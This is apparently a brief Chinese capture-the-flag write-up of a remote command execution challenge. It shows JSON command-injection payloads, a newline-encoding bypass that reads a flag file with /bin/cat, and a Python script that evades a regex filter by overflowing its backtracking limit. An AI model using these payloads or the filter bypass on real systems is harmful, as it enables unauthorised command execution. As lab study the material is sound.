打开题目

它给出了提示要求json格式，先尝试一下{"cmd":"ls"} 

的确可以执行。接下来就记录过滤了那些关键字。发现键盘上有的特殊符号好像都被过滤。

flag在home目录下，不知道为什么find命令返回为空。。。

cat在这里仍然不能用。应该是环境变量配置被改变，所以需要使用/bin/cat调用命令

{%0a"cmd":"/bin/cat%20/home/rceservice/flag"%0A}

利用回溯次数绕过 ，post请求

gei请求会因为头太大而报错

代码：

import requests
 
payload = '{"cmd":"/bin/cat /home/rceservice/flag ","nayi":"' + "a"*(1000000) + '"}' #超过一百万，这里写一千万不会出结果。
 
res = requests.post("ip", data={"cmd":payload})
print(res.text)

python里面运行出结果